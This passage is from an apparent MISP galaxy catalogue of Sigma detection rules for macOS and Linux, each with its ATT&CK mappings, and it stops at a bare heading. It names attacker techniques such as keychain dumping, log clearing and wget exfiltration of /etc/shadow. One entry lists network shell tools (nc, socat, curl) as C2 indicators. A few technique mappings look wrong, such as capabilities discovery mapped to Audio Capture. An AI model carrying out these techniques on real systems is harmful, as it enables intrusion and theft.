https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml

User Added To Admin Group Via Sysadminctl

Detects attempts to create and add an account to the admin group via "sysadminctl"

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via Sysadminctl"

User Added To Admin Group Via Sysadminctl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11478. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml

Local System Accounts Discovery - MacOs

Detects enumeration of local system accounts on MacOS.

The tag is: misp-galaxy:sigma-rules="Local System Accounts Discovery - MacOs"

Local System Accounts Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11479. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml

Potential WizardUpdate Malware Infection

Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.

The tag is: misp-galaxy:sigma-rules="Potential WizardUpdate Malware Infection"

Table 11480. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97

https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml

Indicator Removal on Host - Clear Mac System Logs

Detects deletion of local audit logs

The tag is: misp-galaxy:sigma-rules="Indicator Removal on Host - Clear Mac System Logs"

Indicator Removal on Host - Clear Mac System Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11481. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml

System Shutdown/Reboot - MacOs

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

The tag is: misp-galaxy:sigma-rules="System Shutdown/Reboot - MacOs"

System Shutdown/Reboot - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 11482. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml

Disable Security Tools

Detects disabling of security tools.

The tag is: misp-galaxy:sigma-rules="Disable Security Tools"

Disable Security Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11483. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml

Credentials from Password Stores - Keychain

Detects password dumps from Keychain.

The tag is: misp-galaxy:sigma-rules="Credentials from Password Stores - Keychain"

Credentials from Password Stores - Keychain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 11484. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md

https://gist.github.com/Capybara/6228955

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml

JAMF MDM Execution

Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.

The tag is: misp-galaxy:sigma-rules="JAMF MDM Execution"

Table 11485. Table References

Links

https://www.zoocoup.org/casper/jamf_cheatsheet.pdf

https://github.com/MythicAgents/typhon/

https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml

Network Sniffing - MacOs

Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Network Sniffing - MacOs"

Network Sniffing - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 11486. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml

Default Credentials Usage

Before deploying any new asset, change all default passwords to have values consistent with administrative-level accounts. This Sigma rule detects default credential usage. Sigma rule for the Qualys vulnerability scanner; scan type: Vulnerability Management.

The tag is: misp-galaxy:sigma-rules="Default Credentials Usage"

Table 11487. Table References

Links

https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml

Host Without Firewall

Detects a host without a firewall; an alert means the host is not compliant. Sigma rule for the Qualys vulnerability scanner; scan type: Vulnerability Management.

The tag is: misp-galaxy:sigma-rules="Host Without Firewall"

Table 11488. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml

Cleartext Protocol Usage Via Netflow

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access.

The tag is: misp-galaxy:sigma-rules="Cleartext Protocol Usage Via Netflow"

Table 11489. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd"

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11490. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml

Use Of Hidden Paths Or Files

Detects calls to hidden files or files located in hidden directories on NIX systems.

The tag is: misp-galaxy:sigma-rules="Use Of Hidden Paths Or Files"

Use Of Hidden Paths Or Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 11491. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml

File or Folder Permissions Change

Detects file and folder permission changes.

The tag is: misp-galaxy:sigma-rules="File or Folder Permissions Change"

File or Folder Permissions Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11492. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml

Logging Configuration Changes on Linux Host

Detects changes to syslog daemon configuration files.

The tag is: misp-galaxy:sigma-rules="Logging Configuration Changes on Linux Host"

Logging Configuration Changes on Linux Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11493. Table References

Links

self experience

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml

Systemd Service Creation

Detects the creation of systemd services, which could be used by adversaries to execute malicious code.

The tag is: misp-galaxy:sigma-rules="Systemd Service Creation"

Systemd Service Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

Table 11494. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml

BPFDoor Abnormal Process ID or Lock File Accessed

Detects access to BPFDoor .lock and .pid files in the temporary file storage facility.

The tag is: misp-galaxy:sigma-rules="BPFDoor Abnormal Process ID or Lock File Accessed"

BPFDoor Abnormal Process ID or Lock File Accessed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11495. Table References

Links

https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml

Audio Capture

Detects attempts to record audio with the arecord utility.

The tag is: misp-galaxy:sigma-rules="Audio Capture"

Audio Capture has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 11496. Table References

Links

https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa

https://linux.die.net/man/1/arecord

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml

Credentials In Files - Linux

Detects attempts to extract passwords with grep.

The tag is: misp-galaxy:sigma-rules="Credentials In Files - Linux"

Credentials In Files - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11497. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml

Binary Padding - Linux

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

The tag is: misp-galaxy:sigma-rules="Binary Padding - Linux"

Binary Padding - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 11498. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml

Steganography Hide Files with Steghide

Detects embedding of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

The tag is: misp-galaxy:sigma-rules="Steganography Hide Files with Steghide"

Steganography Hide Files with Steghide has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11499. Table References

Links

https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml

System Owner or User Discovery

Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:sigma-rules="System Owner or User Discovery"

System Owner or User Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 11500. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml

Suspicious C2 Activities

Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'. This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the "Command and Control" tactic, including, non-exhaustively, the following: Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132).

The tag is: misp-galaxy:sigma-rules="Suspicious C2 Activities"

Table 11501. Table References

Links

https://github.com/Neo23x0/auditd

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml

Clipboard Collection with Xclip Tool - Auditd

Detects attempts to collect data stored in the clipboard from users using the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection with Xclip Tool - Auditd"

Clipboard Collection with Xclip Tool - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11502. Table References

Links

https://linux.die.net/man/1/xclip

https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml

Steganography Extract Files with Steghide

Detects extraction of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

The tag is: misp-galaxy:sigma-rules="Steganography Extract Files with Steghide"

Steganography Extract Files with Steghide has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11503. Table References

Links

https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml

Loading of Kernel Module via Insmod

Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate privileges.

The tag is: misp-galaxy:sigma-rules="Loading of Kernel Module via Insmod"

Loading of Kernel Module via Insmod has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"

Table 11504. Table References

Links

https://linux.die.net/man/8/insmod

https://man7.org/linux/man-pages/man8/kmod.8.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml

Webshell Remote Command Execution

Detects possible command execution by a web application or web shell.

The tag is: misp-galaxy:sigma-rules="Webshell Remote Command Execution"

Webshell Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11505. Table References

Links

Personal Experience of the Author

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml

Unix Shell Configuration Modification

Detects Unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.

The tag is: misp-galaxy:sigma-rules="Unix Shell Configuration Modification"

Unix Shell Configuration Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

Table 11506. Table References

Links

https://www.glitch-cat.com/p/green-lambert-and-attack

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

https://objective-see.org/blog/blog_0x68.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml

Screen Capture with Import Tool

Detects an adversary creating a screen capture of a desktop with the Import tool. Using this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations. ImageMagick must be installed.

The tag is: misp-galaxy:sigma-rules="Screen Capture with Import Tool"

Screen Capture with Import Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11507. Table References

Links

https://imagemagick.org/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md

https://linux.die.net/man/1/import

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml

Disable System Firewall

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

The tag is: misp-galaxy:sigma-rules="Disable System Firewall"

Disable System Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11508. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://firewalld.org/documentation/man-pages/firewall-cmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml

Steganography Unzip Hidden Information From Picture File

Detects extraction of a zip file from an image file.

The tag is: misp-galaxy:sigma-rules="Steganography Unzip Hidden Information From Picture File"

Steganography Unzip Hidden Information From Picture File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11509. Table References

Links

https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml

Linux Capabilities Discovery

Detects attempts to discover files with setuid/setgid capabilities set on them. That would allow an adversary to escalate their privileges.

The tag is: misp-galaxy:sigma-rules="Linux Capabilities Discovery"

Linux Capabilities Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11510. Table References

Links

https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099

https://man7.org/linux/man-pages/man8/getcap.8.html

https://mn3m.info/posts/suid-vs-capabilities/

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml

System and Hardware Information Discovery

Detects system information discovery commands

The tag is: misp-galaxy:sigma-rules="System and Hardware Information Discovery"

System and Hardware Information Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11511. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml

Modify System Firewall

Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.

The tag is: misp-galaxy:sigma-rules="Modify System Firewall"

Modify System Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11512. Table References

Links

https://blog.aquasec.com/container-security-tnt-container-attack

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml

Auditing Configuration Changes on Linux Host

Detects changes in auditd configuration files

The tag is: misp-galaxy:sigma-rules="Auditing Configuration Changes on Linux Host"

Auditing Configuration Changes on Linux Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11513. Table References

Links

Self Experience

https://github.com/Neo23x0/auditd/blob/master/audit.rules

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml

Modification of ld.so.preload

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

The tag is: misp-galaxy:sigma-rules="Modification of ld.so.preload"

Modification of ld.so.preload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

Table 11514. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml

Masquerading as Linux Crond Process

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

The tag is: misp-galaxy:sigma-rules="Masquerading as Linux Crond Process"

Masquerading as Linux Crond Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11515. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml

Steganography Hide Zip Information in Picture File

Detects appending of a zip file to an image file

The tag is: misp-galaxy:sigma-rules="Steganography Hide Zip Information in Picture File"

Steganography Hide Zip Information in Picture File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11516. Table References

Links

https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml

Suspicious History File Operations - Linux

Detects commandline operations on shell history files

The tag is: misp-galaxy:sigma-rules="Suspicious History File Operations - Linux"

Suspicious History File Operations - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 11517. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml

File Time Attribute Change - Linux

Detects file time attribute changes made to hide new files or changes to existing files.

The tag is: misp-galaxy:sigma-rules="File Time Attribute Change - Linux"

File Time Attribute Change - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11518. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml

Possible Coin Miner CPU Priority Param

Detects a command line parameter very often used with coin miners

The tag is: misp-galaxy:sigma-rules="Possible Coin Miner CPU Priority Param"

Possible Coin Miner CPU Priority Param has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11519. Table References

Links

https://xmrig.com/docs/miner/command-line-options

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml

Network Sniffing - Linux

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Network Sniffing - Linux"

Network Sniffing - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 11520. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml

Data Exfiltration with Wget

Detects attempts to post a file using the wget utility. An adversary can bypass permission restrictions through a misconfigured sudo permission for the wget utility, which could allow them to read files like /etc/shadow.

The tag is: misp-galaxy:sigma-rules="Data Exfiltration with Wget"

Data Exfiltration with Wget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 11521. Table References

Links

https://gtfobins.github.io/gtfobins/wget/

https://linux.die.net/man/1/wget

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml

Systemd Service Reload or Start

Detects a reload or a start of a service.

The tag is: misp-galaxy:sigma-rules="Systemd Service Reload or Start"

Systemd Service Reload or Start has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

Table 11522. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml

Split A File Into Pieces - Linux

Detects use of the command "split" to split files into parts, possibly for transfer.

The tag is: misp-galaxy:sigma-rules="Split A File Into Pieces - Linux"

Split A File Into Pieces - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 11523. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml

Clipboard Collection of Image Data with Xclip Tool

Detects attempts to collect image data stored in the clipboard from users using the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection of Image Data with Xclip Tool"

Clipboard Collection of Image Data with Xclip Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11524. Table References

Links

https://linux.die.net/man/1/xclip

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml

Bpfdoor TCP Ports Redirect

